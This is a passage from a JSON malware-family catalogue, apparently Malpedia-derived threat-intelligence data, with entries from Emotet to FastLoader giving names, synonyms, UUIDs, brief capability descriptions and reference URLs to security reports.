"https://medium.com/brim-securitys-knowledge-funnel/hunting-emotet-with-brim-and-zeek-1000c2f5c1ff", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://www.bleepingcomputer.com/news/security/united-nations-targeted-with-emotet-malware-phishing-attack/", "https://www.seqrite.com/blog/the-return-of-the-emotet-as-the-world-unlocks/", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/", "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1", "https://www.justice.gov/opa/pr/emotet-botnet-disrupted-international-cyber-operation", "https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/", "https://www.youtube.com/watch?v=8PHCZdpNKrw", "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes", "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2020-ALE-019/", "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf", "https://www.hornetsecurity.com/en/security-information/emotet-update-increases-downloads/", "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/", "https://github.com/mauronz/binja-emotet", "https://www.cert.pl/en/news/single/whats-up-emotet/", "https://persianov.net/emotet-malware-analysis-part-1", "https://persianov.net/emotet-malware-analysis-part-2", "https://mirshadx.wordpress.com/2020/11/22/analyzing-an-emotet-dropper-and-writing-a-python-script-to-statically-unpack-payload/", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://www.eurojust.europa.eu/worlds-most-dangerous-malware-emotet-disrupted-through-global-action", "https://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/", "https://www.binarydefense.com/emocrash-exploiting-a-vulnerability-in-emotet-malware-for-defense/", "https://marcoramilli.com/2019/10/14/is-emotet-gang-targeting-companies-with-external-soc/", "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor", "https://blog.malwarebytes.com/trojans/2020/07/long-dreaded-emotet-has-returned/", "https://www.blueliv.com/blog/research/where-is-emotet-latest-geolocation-data/", "https://adalogics.com/blog/the-state-of-advanced-code-injections", "http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/", "https://hello.global.ntt/en-us/insights/blog/emotet-disruption-europol-counterattack", "https://krebsonsecurity.com/2021/01/international-action-targets-emotet-crimeware", "https://hatching.io/blog/powershell-analysis", "https://quickheal.co.in/documents/technical-paper/Whitepaper_HowToPM.pdf", "https://unit42.paloaltonetworks.com/attack-chain-overview-emotet-in-december-2020-and-january-2021/", "https://r3mrum.wordpress.com/2021/01/05/manual-analysis-of-new-powersplit-maldocs-delivering-emotet/", "https://www.spamhaus.org/news/article/783/emotet-adds-a-further-layer-of-camouflage", "https://isc.sans.edu/forums/diary/Emotet+infections+and+followup+malware/24532/", "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/", "https://blogs.jpcert.or.jp/en/2019/12/emotetfaq.html", "https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/", "https://www.youtube.com/watch?v=_mGMJFNJWSk", "https://www.bleepingcomputer.com/news/security/emotet-malware-hits-lithuanias-national-public-health-center/", "https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/", "https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-droppers/", "http://ropgadget.com/posts/defensive_pcres.html", "https://research.checkpoint.com/emotet-tricky-trojan-git-clones/", "https://blogs.jpcert.or.jp/en/2021/02/emotet-notice.html", "https://cert.grnet.gr/en/blog/reverse-engineering-emotet/", "https://www.bleepingcomputer.com/news/security/emotet-malware-now-steals-your-email-attachments-to-attack-contacts/", "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them", "https://www.zscaler.com/blogs/research/emotet-back-action-after-short-break", "https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-summer-2020-return", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", "https://intel471.com/blog/emotet-takedown-2021/", "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc", "https://blog.trendmicro.com/trendlabs-security-intelligence/emotet-adds-new-evasion-technique-and-uses-connected-devices-as-proxy-cc-servers/", "https://www.tgsoft.it/files/report/download.asp?id=7481257469", "https://feodotracker.abuse.ch/?filter=version_e", "https://www.deepinstinct.com/2020/10/12/why-emotets-latest-wave-is-harder-to-catch-than-ever-before-part-2/", "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf", "https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html", "https://unit42.paloaltonetworks.com/domain-parking/", "https://spamauditor.org/2020/10/the-many-faces-of-emotet/", "https://www.hornetsecurity.com/en/security-informationen-en/webshells-powering-emotet/", "https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html", "https://securelist.com/the-chronicles-of-emotet/99660/", "https://cofense.com/flash-bulletin-emotet-epoch-1-changes-c2-communication/", "https://twitter.com/milkr3am/status/1354459859912192002", "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", "https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf", "https://github.com/d00rt/emotet_research", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", "https://portswigger.net/daily-swig/emotet-trojan-implicated-in-wolverine-solutions-ransomware-attack", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", "https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf", "https://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates", "https://isc.sans.edu/diary/rss/27036", "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta542-banker-malware-distribution-service", "https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-two-596128", "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", "https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html", "https://dissectingmalwa.re/return-of-the-mummy-welcome-back-emotet.html", "https://www.youtube.com/watch?v=EyDiIAt__dI", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", "https://d00rt.github.io/emotet_network_protocol/", "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://www.binarydefense.com/emotet-wi-fi-spreader-upgraded/", "https://blog.malwarebytes.com/botnets/2019/09/emotet-is-back-botnet-springs-back-to-life-with-new-spam-campaign/", "https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/", "https://www.bleepingcomputer.com/news/security/microsoft-emotet-took-down-a-network-by-overheating-all-computers/", "https://www.fortinet.com/blog/threat-research/deep-dive-into-emotet-malware.html", "https://www.melani.admin.ch/melani/de/home/dokumentation/newsletter/Trojaner_Emotet_greift_Unternehmensnetzwerke_an.html", "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", "https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-one-592612", "https://security-soup.net/quick-post-spooky-new-powershell-obfuscation-in-emotet-maldocs/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-003.pdf", "https://blog.malwarebytes.com/threat-analysis/2021/01/cleaning-up-after-emotet-the-law-enforcement-file/", "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/", "https://www.digitalshadows.com/blog-and-research/how-cybercriminals-are-taking-advantage-of-covid-19-scams-fraud-misinformation/", "https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html", "https://medium.com/threat-intel/emotet-dangerous-malware-keeps-on-evolving-ac84aadbb8de" ], "synonyms": [ "Geodo", "Heodo" ], "type": [] }, "uuid": "d29eb927-d53d-4af2-b6ce-17b3a1b34fe7", "value": "Emotet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.empire_downloader", "https://paper.seebug.org/1301/", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://us-cert.cisa.gov/ncas/alerts/aa20-275a", "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", "https://twitter.com/thor_scanner/status/992036762515050496", "https://www.secureworks.com/research/threat-profiles/bronze-firestone", "https://www.secureworks.com/research/threat-profiles/gold-heron", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", "https://redcanary.com/blog/getsystem-offsec/", "https://www.secureworks.com/research/threat-profiles/gold-drake", "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", "https://www.secureworks.com/research/threat-profiles/gold-ulrick", "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-atlas" ], "synonyms": [], "type": [] }, "uuid": "aa445513-9616-4f61-a72d-7aff4a10572b", "value": "Empire Downloader" }, { "description": "Supposedly a worm that was active around 2012-2013.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.emudbot", "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/worm_emudbot.jp" ], "synonyms": [], "type": [] }, "uuid": "d3189268-443b-42f6-99a2-12d29f309c0b", "value": "Emudbot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.enfal", "https://www.secureworks.com/research/threat-profiles/bronze-palace", "https://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-enfals-new-cousin/", "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/", "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-union", "https://www.bsk-consulting.de/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/" ], "synonyms": [ "Lurid" ], "type": [] }, "uuid": "2a4cacb7-80a1-417e-8b9c-54b4089f35d9", "value": "Enfal" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.enviserv", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Enviserv.A" ], "synonyms": [], "type": [] }, "uuid": "58071588-708d-447d-9fb4-8c9268142c82", "value": "Enviserv" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.equationdrug", "https://securelist.com/inside-the-equationdrug-espionage-platform/69203/", "https://mp.weixin.qq.com/s/3ZQhn32NB6p-LwndB2o2zQ", "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/", "http://artemonsecurity.blogspot.com/2017/03/equationdrug-rootkit-analysis-mstcp32sys.html" ], "synonyms": [], "type": [] }, "uuid": "c4490972-3403-4043-9d61-899c0a440940", "value": "EquationDrug" }, { "description": "Rough collection EQGRP samples, to be sorted", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.equationgroup", "https://laanwj.github.io/2016/08/28/feintcloud.html", "https://laanwj.github.io/2016/09/17/seconddate-cnc.html", "https://laanwj.github.io/2016/09/04/blatsting-command-and-control.html", "https://laanwj.github.io/2016/08/22/blatsting.html", "https://laanwj.github.io/2016/09/11/buzzdirection.html", "https://laanwj.github.io/2016/09/23/seconddate-adventures.html", "https://laanwj.github.io/2016/09/13/blatsting-rsa.html", "https://laanwj.github.io/2016/09/01/tadaqueos.html", "https://laanwj.github.io/2016/09/09/blatsting-lp-transcript.html" ], "synonyms": [], "type": [] }, "uuid": "35c1abaf-8dee-48fe-8329-f6e5612eb7af", "value": "Equationgroup (Sorting)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.erebus", "https://www.bleepingcomputer.com/news/security/erebus-ransomware-utilizes-a-uac-bypass-and-request-a-90-ransom-payment/" ], "synonyms": [], "type": [] }, "uuid": "06450729-fe60-4348-9717-c13a487738b9", "value": "Erebus (Windows)" }, { "description": "Eredel Stealer is a low price malware that allows for extracting passwords, cookies, screen desktop from browsers and programs.\r\n\r\nAccording to nulled[.]to:\r\n\r\nSupported browsers\r\nChromium Based: Chromium, Google Chrome, Kometa, Amigo, Torch, Orbitum, Opera, Opera Neon, Comodo Dragon, Nichrome (Rambler), Yandex Browser, Maxthon5, Sputnik, Epic Privacy Browser, Vivaldi, CocCoc and other Chromium Based browsers.\r\n\r\n- Stealing FileZilla\r\n- Stealing an account from Telegram\r\n- Stealing AutoFill\r\n- Theft of wallets: Bitcoin | Dash | Monero | Electrum | Ethereum | Litecoin\r\n- Stealing files from the desktop. Supports any formats, configurable via telegram-bot", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eredel", "https://webcache.googleusercontent.com/search?q=cache:3hU62-Lr2t8J:https://www.nulled.to/topic/486274-eredel-stealer-lite-private-having-control-via-the-web-panel-multifunctional-stealer/+&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-ab" ], "synonyms": [], "type": [] }, "uuid": "acd2555d-b4a1-47b4-983a-fb7b3a402dab", "value": "Eredel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.erica_ransomware", "https://www.dropbox.com/s/f4uulu2rhyj4leb/Girl.scr_malware_report.pdf?dl=0" ], "synonyms": [], "type": [] }, "uuid": "0f4731b3-b661-4677-9e51-474504313202", "value": "Erica Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eris", "https://lekstu.ga/posts/go-under-the-hood-eris/" ], "synonyms": [], "type": [] }, "uuid": "c4531af6-ab25-4266-af41-e01635a93abe", "value": "Eris Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternalrocks", "https://github.com/stamparm/EternalRocks" ], "synonyms": [ "MicroBotMassiveNet" ], "type": [] }, "uuid": "10dd9c6a-9baa-40b6-984a-0598c4d9a88f", "value": "EternalRocks" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternal_petya", "http://blog.talosintelligence.com/2017/10/bad-rabbit.html", "https://securelist.com/from-blackenergy-to-expetr/78937/", "https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html", "https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/", "http://www.intezer.com/notpetya-returns-bad-rabbit/", "https://www.theguardian.com/technology/2017/jul/03/notpetya-malware-attacks-ukraine-warrant-retaliation-nato-researcher-tomas-minarik", "https://www.bleepingcomputer.com/news/security/ransomware-attacks-continue-in-ukraine-with-mysterious-wannacry-clone/", "https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/", "https://threatpost.com/ukrainian-man-arrested-charged-in-notpetya-distribution/127391/", "https://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-you-should-worry-too/", "http://blog.erratasec.com/2017/06/nonpetya-no-evidence-it-was-smokescreen.html", "https://www.crowdstrike.com/blog/petrwrap-technical-analysis-part-2-further-findings-and-potential-for-mbr-recovery/", "https://aguinet.github.io//blog/2020/08/29/miasm-bootloader.html", "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/eternalglue-part-one-rebuilding-notpetya-to-assess-real-world-resilience/", "https://securelist.com/big-threats-using-code-similarity-part-1/97239/", "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-yet-another-stolen-piece-package/", "https://securelist.com/apt-trends-report-q2-2020/97937/", "https://gvnshtn.com/maersk-me-notpetya/", "https://www.cyberscoop.com/russian-hackers-notpetya-charges-gru/", "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games", "http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html", "https://www.wired.com/story/us-indicts-sandworm-hackers-russia-cyberwar-unit/", "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", "https://www.wired.com/story/badrabbit-ransomware-notpetya-russia-ukraine/", "https://www.crowdstrike.com/blog/fast-spreading-petrwrap-ransomware-attack-combines-eternalblue-exploit-credential-stealing/", "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf", "https://blog.comae.io/petya-2017-is-a-wiper-not-a-ransomware-9ea1d8961d3b", "https://www.secureworks.com/research/threat-profiles/iron-viking", "https://securelist.com/schroedingers-petya/78870/", "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/", "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/", "https://securelist.com/apt-trends-report-q2-2019/91897/", "https://www.gdatasoftware.com/blog/2017/07/29859-who-is-behind-petna", "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", "https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4", "https://labsblog.f-secure.com/2017/10/27/the-big-difference-with-bad-rabbit/", "https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/?utm_content=buffer8ffe4&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer", "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-lost-salsa20-key/", "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/", "https://isc.sans.edu/forums/diary/Checking+out+the+new+Petya+variant/22562/", "https://www.fireeye.com/blog/threat-research/2017/10/backswing-pulling-a-badrabbit-out-of-a-hat.html", "https://pylos.co/2020/11/04/the-enigmatic-energetic-bear/", "https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-badrabbit-encryption-routine-specifics.html", "https://securelist.com/bad-rabbit-ransomware/82851/", "https://www.riskiq.com/blog/labs/badrabbit/" ], "synonyms": [ "BadRabbit", "Diskcoder.C", "ExPetr", "NonPetya", "NotPetya", "Nyetya", "Petna", "Pnyetya", "nPetya" ], "type": [] }, "uuid": "6f736038-4f74-435b-8904-6870ee0e23ba", "value": "EternalPetya" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.etumbot", "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html", "https://www.secureworks.com/research/threat-profiles/bronze-globe", "https://www.zscaler.com/blogs/research/cnacom-open-source-exploitation-strategic-web-compromise" ], "synonyms": [ "HighTide" ], "type": [] }, "uuid": "91af1080-6378-4a90-ba1e-78634cd31efe", "value": "EtumBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilbunny", "https://web.archive.org/web/20150311013500/http://www.cyphort.com/evilbunny-malware-instrumented-lua/", "https://web.archive.org/web/20150218192803/http://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/", "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope" ], "synonyms": [], "type": [] }, "uuid": "dc39dcdf-50e7-4d55-94a0-926853f344f3", "value": "Evilbunny" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilgrab", "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn", "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf" ], "synonyms": [ "Vidgrab" ], "type": [] }, "uuid": "438c6d0f-03f0-4b49-89d2-40bf5349c3fc", "value": "EvilGrab" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilnum", "https://github.com/eset/malware-ioc/tree/master/evilnum", "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/" ], "synonyms": [], "type": [] }, "uuid": "da922c36-ca13-4ea2-a22d-471e91ddac93", "value": "EVILNUM (Windows)" }, { "description": "Privately modded version of the Pony stealer.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony", "https://threatpost.com/docusign-phishing-campaign-includes-hancitor-downloader/125724/" ], "synonyms": [ "CREstealer" ], "type": [] }, "uuid": "e26579d9-1d93-4a3b-a41e-263254d85189", "value": "EvilPony" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evrial", "https://www.bleepingcomputer.com/news/security/evrial-trojan-switches-bitcoin-addresses-copied-to-windows-clipboard/" ], "synonyms": [], "type": [] }, "uuid": "af3a3ece-e67f-457a-be72-7651bc720342", "value": "Evrial" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.exaramel", "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf", "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", "https://www.wired.com/story/sandworm-centreon-russia-hack/", "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/" ], "synonyms": [], "type": [] }, "uuid": "dd68abd7-b20a-40a5-be53-ae8d45c1dd27", "value": "Exaramel (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.excalibur", "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies" ], "synonyms": [ "Saber", "Sabresac" ], "type": [] }, "uuid": "3cec2c3c-1669-40cf-8612-eb826f7d2c98", "value": "Excalibur" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.exchange_tool", "https://github.com/nccgroup/Royal_APT", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" ], "synonyms": [], "type": [] }, "uuid": "74f8db32-799c-41e5-9815-6272908ede57", "value": "MS Exchange Tool" }, { "description": "ExileRAT is a simple RAT platform capable of getting information on the system (computer name, username, listing drives, network adapter, process name), getting/pushing files and executing/terminating processes.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.exilerat", "https://blog.talosintelligence.com/2019/02/exilerat-shares-c2-with-luckycat.html" ], "synonyms": [], "type": [] }, "uuid": "c932a2f3-1470-4b0c-8412-2d081901277b", "value": "Exile RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.exorcist", "https://medium.com/@velasco.l.n/exorcist-ransomware-from-triaging-to-deep-dive-5b7da4263d81" ], "synonyms": [], "type": [] }, "uuid": "d742986c-04f0-48ef-aaa3-10eeb0e95be4", "value": "Exorcist Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.extreme_rat", "https://www2.slideshare.net/ChiEnAshleyShen/hitcon-2020-cti-village-threat-hunting-and-campaign-tracking-workshoppptx/1", "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga", "https://www.symantec.com/connect/blogs/colombians-major-target-email-campaigns-delivering-xtreme-rat", "https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html", "https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html", "https://blogs.360.cn/post/APT-C-44.html", "https://community.rsa.com/community/products/netwitness/blog/2017/08/02/malspam-delivers-xtreme-rat-8-1-2017", "https://citizenlab.ca/2015/12/packrat-report/", "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g" ], "synonyms": [ "ExtRat" ], "type": [] }, "uuid": "6ec2b6b1-c1a7-463a-b135-edb51764cf38", "value": "Xtreme RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eye_pyramid", "http://blog.talosintel.com/2017/01/Eye-Pyramid.html", "https://securelist.com/blog/incidents/77098/the-eyepyramid-attacks/" ], "synonyms": [], "type": [] }, "uuid": "a7489029-21d4-44c9-850a-8f656a98cb22", "value": "Eye Pyramid" }, { "description": "EYService is the main part of the backdoor used by Nazar APT. This a passive backdoor that relies on, now discontinued, Packet Sniffer SDK (PSSDK) from Microolap. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eyservice", "https://blog.malwarelab.pl/posts/nazar_eyservice_comm/", "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", "https://blog.malwarelab.pl/posts/nazar_eyservice/", "https://www.epicturla.com/blog/the-lost-nazar", "https://research.checkpoint.com/2020/nazar-spirits-of-the-past/" ], "synonyms": [], "type": [] }, "uuid": "9b287426-e82f-407e-8d12-42dac4241bf8", "value": "EYService" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakerean", "https://0x3asecurity.wordpress.com/2015/11/30/134260124544/", "https://www.exploit-db.com/docs/english/18387-malware-reverse-engineering-part-1---static-analysis.pdf", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/FakeRean#technicalDiv" ], "synonyms": [ "Braviax" ], "type": [] }, "uuid": "653df134-88c9-47e2-99a5-06e0406ab6d4", "value": "FakeRean" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.faketc", "http://www.welivesecurity.com/2015/07/30/operation-potao-express/", "https://www.welivesecurity.com/wp-content/uploads/2015/07/Operation-Potao-Express_final_v2.pdf" ], "synonyms": [], "type": [] }, "uuid": "6b0030bc-6e45-43b0-9175-15fe8fbd0942", "value": "FakeTC" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakeword", "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/" ], "synonyms": [], "type": [] }, "uuid": "6eb3546c-cb8b-447c-81d1-9c4c1166581d", "value": "FakeWord" }, { "description": "FancyFilter is a piece of code that documents code overlap between frameworks used by Regin and Equation Group. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fancyfilter", "https://www.epicturla.com/previous-works/hitb2020-voltron-sta" ], "synonyms": [ "0xFancyFilter" ], "type": [] }, "uuid": "e7d06257-2bc6-45b6-8728-080df9932f90", "value": "fancyfilter" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fanny", "https://fmnagisa.wordpress.com/2020/08/27/revisiting-equationgroups-fanny-worm-or-dementiawheel/", "https://fmmresearch.files.wordpress.com/2020/09/theemeraldconnectionreport_fmmr-2.pdf", "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/#_1", "https://fmmresearch.wordpress.com/2020/09/28/the-emerald-connection-equationgroup-collaboration-with-stuxnet/" ], "synonyms": [ "DEMENTIAWHEEL" ], "type": [] }, "uuid": "6d441619-c5f5-45ff-bc63-24cecd0b237e", "value": "Fanny" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fantomcrypt", "https://www.webroot.com/blog/2016/08/29/fantom-ransomware-windows-update/" ], "synonyms": [], "type": [] }, "uuid": "29f4ae5a-4ccd-451b-bd3e-d301865da034", "value": "FantomCrypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.farseer", "https://unit42.paloaltonetworks.com/farseer-previously-unknown-malware-family-bolsters-the-chinese-armoury/", "https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/", "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/" ], "synonyms": [], "type": [] }, "uuid": "f197b0a8-6bea-42ea-b57f-8f6f202f7602", "value": "Farseer" }, { "description": "FastLoader is a small .NET downloader, which name comes from PDB strings seen in samples. It typically downloads TrickBot. It may create a list of processes and uploads it together with screenshot(s). In more recent versions, it employs simple anti-analysis checks (VM detection) and comes with string obfuscations. \r\n", "meta": { "refs": [ 